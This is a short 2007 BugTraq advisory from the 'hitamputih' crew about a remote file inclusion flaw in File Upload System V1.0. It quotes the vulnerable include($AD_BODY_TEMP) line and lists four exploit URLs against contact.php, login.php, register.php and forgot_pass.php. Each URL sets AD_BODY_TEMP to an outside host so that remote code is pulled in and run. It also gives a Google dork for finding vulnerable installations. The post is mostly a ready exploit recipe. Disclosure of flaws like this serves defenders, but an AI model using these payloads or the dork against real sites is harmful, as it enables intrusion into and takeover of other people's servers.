BugTraq
File Upload System V1.0 (AD_BODY_TEMP) multiple file include Mar 24 2007 03:07PM
ngevedBangetAsli mbuhyesah org
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina & jipank
#-----------------------------------------------------------
# Software: File Upload System V1.0
# Script Demo: http://demo.free-php-scripts.net/File_Upload
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew

[[Exploitz]]---------------------------------------------------------

?php include($AD_BODY_TEMP);?>

exploit :

http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu

gugel dork : intext:"Marsal Design Co."

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus